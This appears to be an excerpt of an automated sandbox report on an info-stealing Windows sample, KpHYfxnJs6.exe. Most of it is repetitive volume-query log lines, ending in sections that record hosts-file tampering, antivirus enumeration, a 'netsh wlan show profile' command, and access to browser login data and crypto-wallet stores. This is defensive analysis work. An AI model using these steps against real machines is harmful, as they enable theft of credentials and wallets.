              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6C0A8 GetSystemTime,SystemTimeToFileTime,109_2_00007FF6FAA6C0A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA648CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,109_2_00007FF6FAA648CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000003.2878432052.000000000838F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2051169917.00000000050F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2051169917.00000000050F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: KpHYfxnJs6.exe PID: 7320, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI73202\rarreg.key, type: DROPPED
Source: Yara match | File source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR
Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
